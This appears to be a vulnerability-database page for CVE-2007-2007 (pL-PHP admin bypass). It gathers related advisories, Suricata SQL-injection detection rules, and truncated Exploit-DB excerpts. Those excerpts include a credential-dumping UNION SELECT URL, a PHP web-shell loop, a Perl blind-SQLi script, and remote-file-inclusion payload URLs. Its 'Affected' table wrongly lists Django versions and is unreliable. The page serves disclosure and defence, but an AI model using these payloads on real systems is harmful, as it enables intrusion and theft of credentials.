CVE-2007-2007
published 2007-04-12CVE-2007-2007: admin.php in pL-PHP beta 0.9 allows remote attackers to bypass authentication by setting the is_admin parameter to 1.
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.66%
83.8th percentile
admin.php in pL-PHP beta 0.9 allows remote attackers to bypass authentication by setting the is_admin parameter to 1.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| djangoproject | django | >= 0.91.0 < 0.91.1 | 0.91.1 |
| djangoproject | django | >= 0.95 < 0.95.2 | 0.95.2 |
| djangoproject | django | >= 0.96.0 < 0.96.1 | 0.96.1 |
| pl-php | pl-php | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vc9h-qrr4-gm2x: admin
ghsa_unreviewed·2022-05-01
CVE-2007-2007 [HIGH] GHSA-vc9h-qrr4-gm2x: admin
admin.php in pL-PHP beta 0.9 allows remote attackers to bypass authentication by setting the is_admin parameter to 1.
GHSA
Django vulnerable to Denial of Service via i18n middleware component
ghsa·2022-05-01
CVE-2007-5712 [HIGH] CWE-400 Django vulnerable to Denial of Service via i18n middleware component
Django vulnerable to Denial of Service via i18n middleware component
The internationalization (i18n) framework in Django 0.91, 0.95, 0.95.1, and 0.96, and as used in other products such as PyLucid, when the USE_I18N option and the i18n component are enabled, allows remote attackers to cause a denial of service (memory consumption) via many HTTP requests with large Accept-Language headers.
Red Hat
phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
vendor_redhat·2008-10-27·CVSS 6.8
CVE-2008-4775 [MEDIUM] CWE-79 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.
Red Hat
plone: python code injection via pickle cookie
vendor_redhat·2007-11-06·CVSS 7.5
CVE-2007-5741 [HIGH] plone: python code injection via pickle cookie
plone: python code injection via pickle cookie
Plone 2.5 through 2.5.4 and 3.0 through 3.0.2 allows remote attackers to execute arbitrary Python code via network data containing pickled objects for the (1) statusmessages or (2) linkintegrity module, which the module unpickles and executes.
Statement: Not vulnerable. This issue did not affect versions of plone included in conga/luci packages as shipped with Red Hat Enterprise Linux 5 or Red Hat Cluster Suite for Red Hat Enterprise Linux 4.
Red Hat
BIND dnssec denial of service
vendor_redhat·2007-01-25·CVSS 4.3
CVE-2007-0494 [MEDIUM] BIND dnssec denial of service
BIND dnssec denial of service
ISC BIND 9.0.x, 9.1.x, 9.2.0 up to 9.2.7, 9.3.0 up to 9.3.3, 9.4.0a1 up to 9.4.0a6, 9.4.0b1 up to 9.4.0b4, 9.4.0rc1, and 9.5.0a1 (Bind Forum only) allows remote attackers to cause a denial of service (exit) via a type * (ANY) DNS query response that contains multiple RRsets, which triggers an assertion error, aka the "DNSSEC Validation" vulnerability.
Cisco
Multiple Vulnerabilities in the Cisco Wireless LAN Controller and Cisco Lightweight Access Points
vendor_cisco
CVE-2007-2037 Multiple Vulnerabilities in the Cisco Wireless LAN Controller and Cisco Lightweight Access Points
CVE-2007-2037: Multiple Vulnerabilities in the Cisco Wireless LAN Controller and Cisco Lightweight Access Points
The Cisco Wireless LAN Controller (WLC) manages Cisco Aironet access points using the Lightweight Access Point Protocol (LWAPP). The WLC contains multiple vulnerabilities that could result in a denial of service (DoS) condition, information disclosure, or access control list changes, or allow an attacker to gain full administrative access. Cisco has made free software available to address these vulnerabilities for affected customers. There are
CWE: CWE-264, CWE-399, CWE-264, CWE-399
Bug IDs: CSCse02384, CSCsc90179, CSCsg36361, CSCsg15901, CSCsh10841
Cisco
Application Inspection Vulnerability in Cisco Firewall Services Module
vendor_cisco
CVE-2007-5584 Application Inspection Vulnerability in Cisco Firewall Services Module
CVE-2007-5584: Application Inspection Vulnerability in Cisco Firewall Services Module
A vulnerability exists in the Cisco Firewall Services Module (FWSM) - a high-speed, integrated firewall module for Cisco Catalyst 6500 switches and Cisco 7600 Series routers, that may result in a reload of the FWSM. The only affected FWSM System Software Version is 3.2(3). There are no known instances of intentional exploitation of this issue. However, Cisco has observed data streams that appear to be unintentionally triggering this vulnerability. Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5584 has been assigned to this vulnerability. Cisco will release software updates that address this vulnerability. A workaround that mitigates this vulnerability is available. This advisory is posted
Suricata
ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- userdetail.php id UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1434 [HIGH] ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- userdetail.php id UNION SELECT
ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- userdetail.php id UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- userdetail.php id UNION SELECT"; flow:established,to_server; http.uri; content:"/userdetail.php?"; nocase; content:"id="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-1434; reference:url,www.securityfocus.com/bid/22911; classtype:web-application-attack; sid:2004350; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_A
Suricata
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- albmgr.php cat INSERT
suricata·2010-07-30·CVSS 6.5
CVE-2007-0122 [MEDIUM] ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- albmgr.php cat INSERT
ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- albmgr.php cat INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- albmgr.php cat INSERT"; flow:established,to_server; http.uri; content:"/albmgr.php?"; nocase; content:"cat="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-0122; reference:url,www.securityfocus.com/bid/21894; classtype:web-application-attack; sid:2005843; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acc
Suricata
ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- printview.php topic SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1163 [HIGH] ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- printview.php topic SELECT
ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- printview.php topic SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- printview.php topic SELECT"; flow:established,to_server; http.uri; content:"/printview.php?"; nocase; content:"topic="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-1163; reference:url,www.milw0rm.com/exploits/3351; classtype:web-application-attack; sid:2004748; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techniqu
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name DELETE
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name DELETE
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name DELETE"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"name="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004496; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mi
Suricata
ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- admin.php uploadimage SELECT
suricata·2010-07-30·CVSS 6.0
CVE-2007-1255 [MEDIUM] ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- admin.php uploadimage SELECT
ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- admin.php uploadimage SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- admin.php uploadimage SELECT"; flow:established,to_server; http.uri; content:"/admin.php?"; nocase; content:"uploadimage="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-1255; reference:url,www.milw0rm.com/exploits/3352; classtype:web-application-attack; sid:2004705; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_
Suricata
ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php ASCII
suricata·2010-07-30·CVSS 6.5
CVE-2007-3140 [MEDIUM] ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php ASCII
ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php ASCII"; flow:established,to_server; http.uri; content:"/xmlrpc.php?"; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-3140; reference:url,www.milw0rm.com/exploits/4039; classtype:web-application-attack; sid:2004658; rev:8; metadata:affected_product Web_Server_Applications, affected_product Wordpress, affected_product Wordpress_Plugins, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, tag Wordpress, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name
Suricata
ET WEB_SPECIFIC_APPS Kisisel Site 2007 SQL Injection Attempt -- forum.asp forumid INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0826 [HIGH] ET WEB_SPECIFIC_APPS Kisisel Site 2007 SQL Injection Attempt -- forum.asp forumid INSERT
ET WEB_SPECIFIC_APPS Kisisel Site 2007 SQL Injection Attempt -- forum.asp forumid INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kisisel Site 2007 SQL Injection Attempt -- forum.asp forumid INSERT"; flow:established,to_server; http.uri; content:"/forum.asp?"; nocase; content:"forumid="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-0826; reference:url,www.exploit-db.com/exploits/3278/; classtype:web-application-attack; sid:2004981; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access
Suricata
ET WEB_SPECIFIC_APPS LiveCMS SQL Injection Attempt -- categoria.php cid DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3293 [HIGH] ET WEB_SPECIFIC_APPS LiveCMS SQL Injection Attempt -- categoria.php cid DELETE
ET WEB_SPECIFIC_APPS LiveCMS SQL Injection Attempt -- categoria.php cid DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS LiveCMS SQL Injection Attempt -- categoria.php cid DELETE"; flow:established,to_server; http.uri; content:"/categoria.php?"; nocase; content:"cid="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-3293; reference:url,www.exploit-db.com/exploits/4082/; classtype:web-application-attack; sid:2006476; rev:11; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_i
Suricata
ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- index.php p_skin SELECT
suricata·2010-07-30·CVSS 6.5
CVE-2007-1254 [MEDIUM] ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- index.php p_skin SELECT
ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- index.php p_skin SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- index.php p_skin SELECT"; flow:established,to_server; http.uri; content:"/index.php?"; nocase; content:"p_skin="; nocase; fast_pattern; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-1254; reference:url,www.milw0rm.com/exploits/3352; classtype:web-application-attack; sid:2004711; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_
Suricata
ET WEB_SPECIFIC_APPS CubeCart SQL Injection Attempt -- cart.inc.php ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-2862 [HIGH] ET WEB_SPECIFIC_APPS CubeCart SQL Injection Attempt -- cart.inc.php ASCII
ET WEB_SPECIFIC_APPS CubeCart SQL Injection Attempt -- cart.inc.php ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS CubeCart SQL Injection Attempt -- cart.inc.php ASCII"; flow:established,to_server; http.uri; content:"/cart.inc.php?"; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-2862; reference:url,www.securityfocus.com/archive/1/archive/1/469301/100/0/threaded; classtype:web-application-attack; sid:2004039; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T
Suricata
ET WEB_SPECIFIC_APPS PHP Labs JobSitePro SQL Injection Attempt -- search.php salary UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1428 [HIGH] ET WEB_SPECIFIC_APPS PHP Labs JobSitePro SQL Injection Attempt -- search.php salary UPDATE
ET WEB_SPECIFIC_APPS PHP Labs JobSitePro SQL Injection Attempt -- search.php salary UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP Labs JobSitePro SQL Injection Attempt -- search.php salary UPDATE"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"salary="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-1428; reference:url,www.exploit-db.com/exploits/3455/; classtype:web-application-attack; sid:2004378; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Ac
Exploit-DB
AutoDealer 1.0/2.0 - MSSQL Injection
exploitdb·2010-04-30
CVE-2007-0053 AutoDealer 1.0/2.0 - MSSQL Injection
AutoDealer 1.0/2.0 - MSSQL Injection
---
# vendor :http://www.aspsiteware.com/Auto.asp
# Date: 30 apr,2010
# Dork:Copyright © 2010 ASP SiteWare. All rights reserved.
#####################Sid3^effects aKa HaRi##################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR
#ShouTZ:kedar,dec0d3r,41.w4r10r
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################
Description :
AutoDealer is an application ideal for the small or independent new or used car dealer who needs a way
to display and update their inventory online. Backend by Access database, AutoDealer can store
thousands of vehicles in catego
Exploit-DB
HP Instant Support 1.0.22 - 'HPISDataManager.dll ExtractCab' ActiveX Control Buffer Overflow
exploitdb·2008-06-03
CVE-2007-5604 HP Instant Support 1.0.22 - 'HPISDataManager.dll ExtractCab' ActiveX Control Buffer Overflow
HP Instant Support 1.0.22 - 'HPISDataManager.dll ExtractCab' ActiveX Control Buffer Overflow
---
source: https://www.securityfocus.com/bid/29529/info
HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of an application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
HP Instant Support 1.0.0.22 and earlier versions are affected.
NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own
Exploit-DB
MKPortal 1.1 Gallery Module - SQL Injection
exploitdb·2007-12-13
CVE-2007-6467 MKPortal 1.1 Gallery Module - SQL Injection
MKPortal 1.1 Gallery Module - SQL Injection
---
source: https://www.securityfocus.com/bid/26860/info
MKPortal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects MKPortal M1.1 RC1; other versions may also be vulnerable.
http://www.example.com/index.php?ind=gallery&op=foto_show&ida=(sql)
Exploit-DB
Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055)
exploitdb·2007-10-29
CVE-2007-2217 Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055)
Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055)
---
/* MS07-055 Kodak Image Viewer TIF/TIFF Code Execution Proof Of Concept
by Hong Gil-Dong, Jeon Woo-chi
* Hwang-Hee(?~1542), Prime Minister in Korea
* Once upon a time, One servant of Hwang-Hee was arguing with another
* servant. they asked Hwang-Hee to judge who is right.
* Hwang-Hee listend their story, and said "Both are right".
* We tested this code on Windows 2000 SP4 Korean Edition.
* But if you change some parts of this code, you can also execute an
* arbitrary code in other systems.
* - Caution -
* First, execute the Kodak Image Viewer and then open the ms07-005.tif
* file. If you click the ms07-005.tif file directly in explorer,
* sometimes it causes not excution but just crash.
*/
#include
#define TIF_FILE "ms07-055
Exploit-DB
eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
---
#!/usr/bin/perl
#
# extremail-v3.pl
#
# Copyright (c) 2006 by
#
# eXtremail [1,50]
$max_len = int(rand(50) + 1);
# [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1]
$pad1_len = int(rand($max_len * 0.75));
# [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2]
$pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1);
$pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s"));
$buf = "USER ".
($NOP x $pad1_len).
("%s" x $pad2_len).
($NOP x $pad3_len).
"\n";
print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf);
send(SOCKET, $buf, 0);
sleep($send_delay);
close(SOCKET);
}
}
sub print_header {
print("eXtremail \n");
print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}
sub usage {
p
Exploit-DB
Joomla! Component mosmedialite451 - Remote File Inclusion
exploitdb·2007-10-08
CVE-2007-5362 Joomla! Component mosmedialite451 - Remote File Inclusion
Joomla! Component mosmedialite451 - Remote File Inclusion
---
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts : MOSMediaLite451
Discovered By : k1n9k0ng
Scripts site : http://www.djoomla.com/component/option,com_remository/Itemid,2/func,fileinfo/id,104/
Thanks To : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To : adhietslank, babypunk, cyberlog, cah_gemblunkz, the_sims, ARiee, letjen, k1tk4t
site : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
bug Script:
include_once( $mosConfig_absolute_path . "/administrator/components/com_mosmedia/mosmedia.config.php" );
bug found:
"http://www.site.net/administrator/components/com_mosmedia/includ
Exploit-DB
helplink 0.1.0 - 'show.php' Remote File Inclusion
exploitdb·2007-09-23
CVE-2007-5099 helplink 0.1.0 - 'show.php' Remote File Inclusion
helplink 0.1.0 - 'show.php' Remote File Inclusion
---
##########################################################################
# Helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability #
# D.S : http://sourceforge.net/projects/helplink/ #
# V.C #
================================show.php=================================#
01 : #
=========================================================================#
# POC : /show.php?file=Ev!L C0D3 #
##########################################################################
# milw0rm.com [2007-09-23]
Exploit-DB
Hexamail Server 3.0.0.001 - 'pop3' Remote Overflow (PoC)
exploitdb·2007-08-30
CVE-2007-4646 Hexamail Server 3.0.0.001 - 'pop3' Remote Overflow (PoC)
Hexamail Server 3.0.0.001 - 'pop3' Remote Overflow (PoC)
---
# milw0rm.com [2007-08-30]
Exploit-DB
Mozilla Firefox/Thunderbird/SeaMonkey - Chrome-Loaded About:Blank Script Execution
exploitdb·2007-07-31
CVE-2007-3844 Mozilla Firefox/Thunderbird/SeaMonkey - Chrome-Loaded About:Blank Script Execution
Mozilla Firefox/Thunderbird/SeaMonkey - Chrome-Loaded About:Blank Script Execution
---
source: https://www.securityfocus.com/bid/25142/info
Mozilla Firefox, Thunderbird, and SeaMonkey are prone to a vulnerability that allows JavaScript to execute with unintended privileges.
A malicious site may be able to cause the execution of a script with Chrome privileges. Attackers could exploit this issue to execute hostile script code with privileges that exceed those that were intended. Certain Firefox extensions may not intend 'about:blank' to execute script code with Chrome privileges.
NOTE: This issue was introduced by the fix for MFSA 2007-20.
The following proof of concept is available:
w=open("about:blank");alert(1);u="javascript:alert(Components.stack);";w.document.body.innerHTML=u.li
Exploit-DB
SNMPc 7.0.18 - Remote Denial of Service (Metasploit)
exploitdb·2007-06-04
CVE-2007-3098 SNMPc 7.0.18 - Remote Denial of Service (Metasploit)
SNMPc 7.0.18 - Remote Denial of Service (Metasploit)
---
##
# $Id: snmpc.rb 2007-06-03 $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Auxiliary::Dos::Windows::Snmpc 'SNMPc ',
'Description' => %q{
This module sends a specially-crafted packet to the service login of snmpc
causing a denial of service of snmpc.
},
'Author' => [ 'En Douli, Tks to OaiTeam ' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'CVE', 'XXXXXXX' ],
]))
register_options([Opt::RPORT(165),], self.class)
end
def run
connect
init
Exploit-DB
CommuniGate Pro 5.1.8 - Web Mail HTML Injection
exploitdb·2007-05-12
CVE-2007-2718 CommuniGate Pro 5.1.8 - Web Mail HTML Injection
CommuniGate Pro 5.1.8 - Web Mail HTML Injection
---
source: https://www.securityfocus.com/bid/23950/info
CommuniGate Pro is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
CommuniGate Pro 5.1.8 and earlier versions are vulnerable to this issue.
Note that this issue is present only when using Microsoft Internet Explorer.
@im\port'\ja\vasc\ript:alert("XSS in message body (style using import)")';
Exploit-DB
Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)
exploitdb·2007-05-04
CVE-2007-2537 Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)
Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)
---
")."&Xfiles=header_head&confirm=Sauver+les+modifications")."\r\n\r\n";
$reqshell .= "Xtxt=".urlencode("")."&Xfiles=header_before&confirm=Sauver+les+modifications";
fwrite($sock, $reqshell);
unset($reqshell);
$pageshell = '';
while(!feof($sock)) {
$pageshell .= fgets($sock);
}
fclose($sock);
if(preg_match('`location: admin\.php\?op=ConfigFiles`', $pageshell)) { $ok = 1; }
unset($pageshell);
if(!$ok) {
die("Failed\r\n\r\nUnable to write PHP Code");
} else {
echo "OK\r\n\r\n";
}
while(1) {
unset($exec);
echo "[PhpShell@".$argv[1]."]$ ";
$input = trim(fgets(STDIN));
if($input == 'quit' || $input == 'exit') {
break;
}
$sock = @fsockopen($argv[1], 80, $eno, $estr, 30);
if (!$sock) {
die("\r\nCould not connect to ".$argv[1
Exploit-DB
Censura 1.15.04 - 'censura.php?vendorid' SQL Injection
exploitdb·2007-05-03
CVE-2007-2673 Censura 1.15.04 - 'censura.php?vendorid' SQL Injection
Censura 1.15.04 - 'censura.php?vendorid' SQL Injection
---
Censura v1.15.04 (vendorid) Remote SQL Injection
Found: Cyber-Security.org
Exploit:
censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/
google dork: "Powered by: Censura"
vendor: http://www.censura.info/
# milw0rm.com [2007-05-03]
Exploit-DB
MyBulletinBoard (MyBB) 1.2.5 - 'calendar.php' Blind SQL Injection
exploitdb·2007-04-23
CVE-2007-2212 MyBulletinBoard (MyBB) 1.2.5 - 'calendar.php' Blind SQL Injection
MyBulletinBoard (MyBB) 1.2.5 - 'calendar.php' Blind SQL Injection
---
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # MyBulletinBoard #\n";
print " # Example: perl mybb.pl www.host.com /mybb/ -u 5 #\n";
print " # #\n";
print " # Options: #\n";
print " # -u User-ID, default: 1 #\n";
print " # -p Proxy support #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my %options = ();
GetOptions(\%options, "u=i", "p=s");
print "[+] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
syswrite(STDOUT, "[+] MD5-Hash: ", 14);
for(my $i = 1; $i new;
my $query = "http://".$
Exploit-DB
SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion
exploitdb·2007-04-16
CVE-2007-2070 SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion
SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion
---
sunshop 4 (index.php) Remote File Include Vulnerability
# scripts : SunShop v3.5
# Discovered By : irvian
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Thanks To : #hitamputih #nyubicrew #patihack
# special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
# dork : "powered by sunshop"
bug found:
Exploit: www.target.com/index.php?abs_path=[evilcode]
www.target.com/checkout.php?abs_path=[evilcode]
# milw0rm.com [2007-04-16]
Exploit-DB
pl-PHP Beta 0.9 - Multiple Vulnerabilities
exploitdb·2007-04-10
CVE-2007-2008 pl-PHP Beta 0.9 - Multiple Vulnerabilities
pl-PHP Beta 0.9 - Multiple Vulnerabilities
---
. . .
._ | _. .|_ _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
| ._|
"pL-PHP beta 0.9 - MULTIPLE VULNERABILITIES"
by Omni
1) Infos
Date : 2007-04-10
Product : pL-PHP
Version : beta 0.9 - Prior version maybe also be affected
Vendor : http://sourceforge.net/projects/pl-php/ - http://www.karlcore.com/programming/blog/
Vendor Status : 2007-04-10 -> Not Informed!
Description : pL-PHP is a new PHP Portal or Content Management System (CMS). It is based on a "multi-topics" system,
with sub-topics, and all the content (downloads, articles, headers, links...) is shared into these topics
and sub-topics. It will be very easy to use.
Source : omnipresent - omni
E-mail : omnipresent[at]email[dot]it - omni[at]playhack[dot]net
Team : Playhack.net Security
2) Sec
Exploit-DB
W-Agora 4.2.1 - 'change_password.php?userid' Cross-Site Scripting
exploitdb·2007-03-20
CVE-2007-1606 W-Agora 4.2.1 - 'change_password.php?userid' Cross-Site Scripting
W-Agora 4.2.1 - 'change_password.php?userid' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/23057/info
